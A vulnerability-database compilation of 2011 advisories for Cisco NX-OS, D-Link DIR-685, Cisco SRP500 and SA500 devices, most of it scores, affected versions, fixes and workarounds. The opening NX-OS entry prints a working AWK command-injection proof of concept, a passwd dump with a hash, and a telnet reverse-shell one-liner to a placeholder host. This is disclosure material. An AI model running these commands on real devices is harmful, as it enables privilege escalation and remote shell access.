Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188. The issue is tracked as Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188. Privileges may be obtained by local users. The Cisco Nexus Series switches are data center switches that run the Cisco Nexus OS operating system. The section command passes the request string to an AWK script, but the input is not fully filtered. Any command can be executed on the Linux subsystem.
nx1# sh clock | sed 's/.*/BEGIN \\{ system\\(\\\"id \"\\) \\}/' > 20110713.awk
Warning: There is already a file existing with this name. Do you want to overwrite (yes/no)? [no] y
nx1# sh clock | sec '* -f /bootflash /20110713.awk '
uid=2003(user) gid=504(network-operator)
11:16:04.082 UTC Wed Jul 13 2011
nx1# sh clock | sed 's/.*/BEGIN \\{ system\\(\\\"ls \\/mnt\\/cfg\\/0\\/\"\\) \\}/' > 20110713.awk
nx1# sh clock | sec '* -f /bootflash/20110713.awk '
ascii bin boot cfglabel.sysmgr debug licenses linux log lost +found
11:18:41.885 UTC Wed Jul 13 2011
This can be used to delete any file in the boot flash or to send the 'reboot' command. In addition, within the less command, pressing the colon and then the "e" key lets you specify the path of a file to open, so any system file can be viewed: bin:*:1:1:bin:/bin: daemon:*:2:2:daemon :/usr/sbin: sys:*:3:3:sys:/dev: ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:UvdRSOzORvz9o:99:14:ftpuser: /var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm Use "|" (pipe) and then press the "$" macro key to execute the command: !ls -lah > /bootflash/20110715 You can also create a remote shell by doing the following: mknod rs p; telnet ad.dr.es. s 8888 0<rs | /bin/bash 1>rs. 
A local attacker can exploit these issues to execute arbitrary commands with administrative privileges. Successful exploits may compromise the affected computer. Cisco MDS, UCS, Nexus 7000, 5000, 4000, 3000, 2000, and 1000V are vulnerable; other versions may also be affected
VAR-201111-0163 CVE-2011-4507 D-Link DIR-685 Xtreme N storage router WPA/WPA2 encryption failure CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The D-Link DIR-685 router, when certain WPA and WPA2 configurations are used, does not maintain an encrypted wireless network during transfer of a large amount of network traffic, which allows remote attackers to obtain sensitive information or bypass authentication via a Wi-Fi device. The D-Link DIR-685 Xtreme N Storage Router has a vulnerability in which communication is performed without encryption even if WPA/WPA2 is configured. Even if the D-Link DIR-685 Xtreme N Storage Router is set to communicate using WPA-PSK or WPA2-PSK with AES encryption, communication is performed without encryption under heavy load conditions such as the transmission of a huge amount of data. After that, communication is not encrypted until the device is restarted. Communication contents may be intercepted by a third party within wireless LAN range of the affected device. The D-Link DIR-685 is a wireless router device. The device needs to be restarted to restore the original encryption state. D-Link DIR-685 is prone to an authentication-bypass vulnerability. Attackers can exploit this issue to connect to the affected device without authentication. This may aid in further attacks. D-Link is a network company founded by Taiwan D-Link Group, dedicated to the R&D, production and marketing of LAN, broadband network, wireless network, voice network and related network equipment.
TITLE: D-Link DIR-685 Xtreme N Storage Router Encryption Failure Weakness SECUNIA ADVISORY ID: SA46380 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46380/ RELEASE DATE: 2011-10-13 DESCRIPTION: A weakness has been reported in D-Link DIR-685 Xtreme N Storage Router, which can be exploited by malicious people to bypass certain security restrictions. The weakness is caused due to an error in the router when configured with WPA/WPA2 and an AES pre-shared key (PSK) cipher. SOLUTION: Do not use an AES pre-shared key (PSK) cipher. PROVIDED AND/OR DISCOVERED BY: Jerry Decime via US-CERT. ORIGINAL ADVISORY: US-CERT: http://www.kb.cert.org/vuls/id/924307
VAR-201111-0147 CVE-2011-4005 Cisco Small Business Vulnerable to cross-site request forgery CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Cross-site request forgery (CSRF) vulnerability in the Services Ready Platform Configuration Utility web interface on the Cisco Small Business SRP521W, SRP526W, and SRP527W with firmware before 1.1.24 and the Small Business SRP541W, SRP546W, and SRP547W with firmware before 1.2.1 allows remote attackers to hijack the authentication of administrators for requests that execute arbitrary commands, aka Bug ID CSCtr45124. The issue is tracked as Bug ID CSCtr45124. A third party may be able to hijack the authentication of an administrator for requests that execute arbitrary commands. Cisco Small Business SRP500 Series Appliances are prone to a remote command-injection vulnerability. Successful exploits will result in the execution of arbitrary attacker-supplied commands in the context of the root user. This may facilitate a complete compromise. This issue is being tracked by Cisco bug ID CSCtr45124.
TITLE: Cisco Small Business SRP520 / SRP540 Series Command Injection Vulnerability SECUNIA ADVISORY ID: SA46664 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46664/ RELEASE DATE: 2011-11-03 DESCRIPTION: A vulnerability has been reported in Cisco Small Business SRP520 / SRP540 series, which can be exploited by malicious people to compromise a vulnerable system. by tricking a logged-in administrator into following a malicious link. * Cisco SRP526W versions prior to 1.1.24. * Cisco SRP527W versions prior to 1.1.24. * Cisco SRP541W versions prior to 1.2.1. * Cisco SRP546W versions prior to 1.2.1. * Cisco SRP547W versions prior to 1.2.1. SOLUTION: Update to version 1.1.24 or 1.2.1. PROVIDED AND/OR DISCOVERED BY: The vendor credits Michal Sajdak, Securitum. 
ORIGINAL ADVISORY: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111102-srp500

Cisco Security Advisory: Cisco Small Business SRP500 Series Command Injection Vulnerability

Advisory ID: cisco-sa-20111102-srp500

Revision 1.0

For Public Release 2011 November 2 16:00 UTC (GMT)

+--------------------------------------------------------------------

Summary
=======

Cisco Small Business SRP500 Series Services Ready Platforms contain an operating system command injection vulnerability.

Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are available.

This advisory is posted at http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111102-srp500.

Affected Products
=================

Vulnerable Products
+------------------

The following Cisco Small Business SRP520 Series models are affected if running firmware prior to version 1.1.24:

  * Cisco SRP521W
  * Cisco SRP526W
  * Cisco SRP527W

The following Cisco Small Business SRP540 Series models are affected if running firmware prior to version 1.2.1:

  * Cisco SRP541W
  * Cisco SRP546W
  * Cisco SRP547W

To view the firmware version on a device, log in to the Services Ready Platform Configuration Utility and navigate to the "Status > Router" page to view information about the SRP and its firmware status. The "Firmware Version" field indicates the current running version of firmware on the SRP500 Series device.

Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are currently known to be affected by this vulnerability.

Details
=======

Cisco Small Business SRP500 Series Services Ready Platforms are flexible, cost-effective, fixed-configuration customer premises equipment (CPE) with embedded intelligence to enable service providers to create, provision, and deploy premium revenue-generating services -- a variety of high-quality IP voice, data, security, and wireless services -- to small businesses on an as-needed basis.

For this vulnerability to be exploited, a remote attacker must either entice an administrator to access a crafted link or perform a man-in-the-middle attack, intercepting an authenticated session.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtr45124 ("Cisco Small Business SRP500 Series Services Ready Platforms Command Injection Vulnerability")

CVSS Base Score - 9.3
    Access Vector          - Network
    Access Complexity      - Medium
    Authentication         - None
    Confidentiality Impact - Complete
    Integrity Impact       - Complete
    Availability Impact    - Complete

CVSS Temporal Score - 7.7
    Exploitability         - Functional
    Remediation Level      - Official-Fix
    Report Confidence      - Confirmed

Impact
======

Successful exploitation of the vulnerability may result in the execution of arbitrary commands on the device.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Small Business Support Center or your contracted maintenance provider for assistance.

This vulnerability has been fixed in the following firmware versions:

+------------------------------------------------------------+
| Affected Product         | First Fixed Release             |
|--------------------------+---------------------------------|
| Cisco SRP521W            | 1.1.24                          |
|--------------------------+---------------------------------|
| Cisco SRP526W            | 1.1.24                          |
|--------------------------+---------------------------------|
| Cisco SRP527W            | 1.1.24                          |
|--------------------------+---------------------------------|
| Cisco SRP541W            | 1.2.1                           |
|--------------------------+---------------------------------|
| Cisco SRP546W            | 1.2.1                           |
|--------------------------+---------------------------------|
| Cisco SRP547W            | 1.2.1                           |
+------------------------------------------------------------+

The latest Cisco Small Business SRP500 Series Services Ready Platforms firmware can be downloaded at http://www.cisco.com/cisco/software/navigator.html?mdfid=282736194&i=rm

Workarounds
===========

The following mitigations help limit exposure to this vulnerability.

  * Disable Remote Management

    Caution: Do not disable remote management if administrators manage devices via the WAN connection. This action will result in a loss of management connectivity to the device.

    Remote Management is enabled by default. Administrators can disable this feature by choosing "Administration > Web Access Management". Change the setting for the Remote Management field to Disabled. Disabling remote management limits exposure because the vulnerability can then be exploited from the inter-LAN network only.

  * Limit Remote Management Access to Specific IP Addresses

    If remote management is required, secure the device so that it can be accessed by certain IP addresses only, rather than the default setting of All IP Addresses. After choosing "Administration > Web Access Management", an administrator can change the Allowed Remote IP Address setting to ensure that only devices with specified IP addresses can access the device.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any malicious use of the vulnerability described in this advisory. This vulnerability was demonstrated at a conference in San Jose, CA on November 2, 2011. This vulnerability was reported to Cisco by Michal Sajdak of Securitum, Poland.

Status of this Notice: Final
============================

Distribution
============

This advisory is posted on Cisco's worldwide website at: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111102-srp500

Revision History
================

+------------------------------------------------------------+
| Revision 1.0 | 2011-November-2 | Initial draft release.    |
+------------------------------------------------------------+
VAR-201107-0139 CVE-2011-2546 SQL injection vulnerability in Cisco SA 500 series security appliances CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
SQL injection vulnerability in the web-based management interface on Cisco SA 500 series security appliances with software before 2.1.19 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka Bug ID CSCtq65669. A third party may be able to execute SQL commands. Exploiting this issue could allow an authenticated attacker to compromise the affected device, access or modify data, or exploit latent vulnerabilities in the underlying database. This issue is being tracked by Cisco Bug ID CSCtq65669. The following devices are affected: Cisco SA520, Cisco SA520W, Cisco SA540. Both vulnerabilities can be exploited over the network. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110720-sa500.shtml Affected Products ================= Vulnerable Products +------------------ These vulnerabilities affect the following devices running a software version prior to the first fixed release documented in the Software Versions and Fixes section of this advisory: * Cisco SA520 * Cisco SA520W * Cisco SA540 There are multiple methods to determine the version of system software that is running on a device. At the device web login screen, the system software version is displayed under the "Security Appliance Configuration Utility" heading. Administrators can also log in to a device through the web management interface and navigate to Administration > Firmware & Configuration > Network. The Primary Firmware field appears below Status Information. The number directly beside the Primary Firmware field is the system software version. Alternatively, after logging in to the device, administrators can click on the About link at the top right of the screen.
The system software version will be displayed below the "Security Appliance Configuration Utility" heading. An example of the system firmware version is 2.1.18. Products Confirmed Not Vulnerable +--------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. This vulnerability is documented in Cisco bug ID CSCtq65669 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2011-2546 * Privilege Escalation Vulnerability An authenticated user who is logged in to an affected device could exploit this vulnerability to inject arbitrary commands into the underlying operating system. By supplying malicious parameters through several web forms, the attacker could gain root privileges. This vulnerability is documented in Cisco bug ID CSCtq65681 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2011-2547 Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. 
Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtq65669 - SQL injection vulnerability
  CVSS Base Score - 5.0
    Access Vector - Network
    Access Complexity - Low
    Authentication - None
    Confidentiality Impact - Partial
    Integrity Impact - None
    Availability Impact - None
  CVSS Temporal Score - 4.1
    Exploitability - Functional
    Remediation Level - Official-Fix
    Report Confidence - Confirmed

* CSCtq65681 - Privilege escalation vulnerability
  CVSS Base Score - 9.0
    Access Vector - Network
    Access Complexity - Low
    Authentication - Single
    Confidentiality Impact - Complete
    Integrity Impact - Complete
    Availability Impact - Complete
  CVSS Temporal Score - 7.4
    Exploitability - Functional
    Remediation Level - Official-Fix
    Report Confidence - Confirmed

Impact ====== Successful exploitation of the SQL injection vulnerability could allow the retrieval of usernames and passwords. An authenticated user could exploit the privilege escalation vulnerability to execute underlying operating system commands. Software Versions and Fixes =========================== When considering software upgrades, also consult: http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Small Business Support Center or your contracted maintenance provider for assistance. These vulnerabilities have been corrected in software versions 2.1.19 and later.
If administrators of SA 500 Series Security Appliances have configured the Check for New Firmware notification under Administration > Firmware & Configuration > Network, a message regarding new firmware that is available on Cisco.com will be displayed at the next log in to the appliance. Note: the SA 500 will not perform an automatic upgrade to version 2.1.19. The upgrade must be performed by an administrator. The latest software for SA 500 Series Security Appliances can be downloaded at: http://www.cisco.com/cisco/software/navigator.html?mdfid=282414017 Workarounds =========== The following mitigations help limit the exposure to these vulnerabilities. * Disable Remote Management Caution: Do not disable remote management if administrators manage devices via the WAN connection. This action will result in a loss of management connectivity to the device. Several features also require remote management to be enabled, including SSL VPN access and the Cisco Quick Virtual Private Network (QVPN) Utility. Remote Management is disabled by default. Administrators can disable this feature by choosing Network Management > Remote Management. Change the setting for this field to Disabled. Disabling remote management limits exposure because the vulnerabilities can then be exploited from the inter-LAN network only. * Limit Remote Management Access to Specific IP Addresses If remote management is required, secure the device so that it can be accessed by certain IP addresses only, rather than the default setting of All IP Addresses. After choosing Network Management > Remote Management, an administrator can change the Remote IP Address field to ensure that only devices with specified IP addresses can access the device. Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities.
Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at: http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html Or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com If the information is not clear, please contact the Cisco Small Business Support Center or your contracted maintenance provider for assistance. Small Business Support Center contacts are as follows. +1 866 606 1866 (toll free from within North America) +1 408 418 1866 (toll call from anywhere in the world) Customers should have their product serial number available. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_small_business_support_center_contacts.html for additional support contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory. These vulnerabilities were reported to Cisco by Michal Sajdak of Securitum, Poland. 
Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110720-sa500.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +-------------------------------------------------------------------+ | Revision 1.0 | 2011-July-20 | Initial public release. 
| +-------------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +--------------------------------------------------------------------
TITLE: Cisco SA 500 Series Web Management Interface Two Vulnerabilities SECUNIA ADVISORY ID: SA45355 VERIFY ADVISORY: http://secunia.com/advisories/45355/ RELEASE DATE: 2011-07-22 DESCRIPTION: Two vulnerabilities have been reported in Cisco SA 500 Series Security Appliances, which can be exploited by malicious users to compromise a vulnerable system and by malicious people to conduct SQL injection attacks. 1) Certain input passed to the login form is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 2) Certain unspecified input passed to the web management interface is not properly sanitised before being used. This can be exploited to inject and execute arbitrary shell commands. PROVIDED AND/OR DISCOVERED BY: The vendor credits Michal Sajdak, Securitum.
ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20110720-sa500.shtml